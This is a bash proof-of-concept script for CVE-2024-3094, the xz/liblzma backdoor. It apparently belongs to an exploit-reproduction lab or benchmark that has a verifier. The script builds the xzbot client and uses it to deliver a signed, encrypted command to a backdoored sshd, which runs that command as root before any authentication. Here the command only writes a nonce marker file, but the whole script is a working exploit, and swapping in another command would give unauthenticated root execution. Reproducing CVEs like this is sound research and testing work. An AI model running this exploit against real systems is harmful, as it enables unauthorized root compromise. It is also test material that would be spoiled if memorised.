#!/usr/bin/env bash # CVE-2024-3094 (xz/liblzma backdoor) PoC orchestrator. # # Drives the backdoored sshd as an UNAUTHENTICATED SSH client using the # canonical amlweems/xzbot client (vendored under exploit/xzbot). The client # crafts an RSA certificate whose modulus N carries an ED448(seed=0)-signed, # ChaCha20-encrypted "system()" command. The seed=0-patched liblzma in the # target validates the signature and runs the command as root pre-auth. # # The ONLY thing this script does to the target is deliver a command over the # network to the backdoor. It performs NO docker exec / local write of the # marker -- the marker is produced solely by the backdoor running the command. # # Parametrization (verifier supplies a fresh path + nonce at run time): # MARKER_PATH - absolute path inside the target where the marker is written # NONCE - unique per-run value written into the marker # Accepted as positional args OR env vars, with defaults for a smoke run. # # Usage: # bash exploit/run.sh [MARKER_PATH] [NONCE] # MARKER_PATH=/tmp/m NONCE=abc bash exploit/run.sh set -euo pipefail SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" XZBOT_DIR="$SCRIPT_DIR/xzbot" # --- parameters ------------------------------------------------------------- MARKER_PATH="${1:-${MARKER_PATH:-/tmp/xzpoc_marker}}" NONCE="${2:-${NONCE:-xzpoc-$(date +%s)-$$}}" # --- target / network (matches environment.md) ------------------------------ # Reachable from a container attached to the compose network env_default. TARGET_HOST="${TARGET_HOST:-cve-2024-3094-sshd}" TARGET_PORT="${TARGET_PORT:-22}" NETWORK="${NETWORK:-env_default}" SEED="${SEED:-0}" # Command delivered to the backdoor. system() runs it as root. # Keep <= 64 chars (xzbot/backdoor cmd-length limit). CMD="echo $NONCE > $MARKER_PATH" if [ "${#CMD}" -gt 64 ]; then echo "ERROR: delivered command is ${#CMD} chars (>64). Use a shorter NONCE/MARKER_PATH." >&2 exit 2 fi echo "[*] target : ${TARGET_HOST}:${TARGET_PORT} (network=${NETWORK})" echo "[*] seed : ${SEED}" echo "[*] marker path : ${MARKER_PATH}" echo "[*] nonce : ${NONCE}" echo "[*] delivered cmd : ${CMD} (len=${#CMD})" echo # --- build xzbot from vendored source inside an amd64 golang container ------- # (no network needed: deps are vendored under xzbot/vendor) if [ ! -x "$XZBOT_DIR/xzbot" ]; then echo "[*] building xzbot from vendored source ..." docker run --rm --platform linux/amd64 \ -v "$XZBOT_DIR":/src -w /src golang:1.22-bookworm \ sh -c 'CGO_ENABLED=0 go build -mod=vendor -o xzbot .' fi # --- fire the backdoor as an unauthenticated network client ----------------- echo "[*] firing xzbot (unauthenticated SSH client) ..." set +e docker run --rm --platform linux/amd64 --network "$NETWORK" \ -v "$XZBOT_DIR/xzbot":/xzbot:ro \ debian:bookworm-slim \ /xzbot -addr "${TARGET_HOST}:${TARGET_PORT}" -seed "$SEED" -cmd "$CMD" rc=$? set -e # xzbot exits non-zero with "handshake failed: EOF" precisely WHEN the backdoor # fires (the connection is torn down after system() runs). That EOF is the # expected fired-signature, not an error. We do not assert success here -- the # verifier reads the marker out-of-band via its privileged channel. echo echo "[*] xzbot exited rc=${rc} (EOF after system() is the expected fired signature)" echo "[*] done. Verifier: read ${MARKER_PATH} via the privileged channel."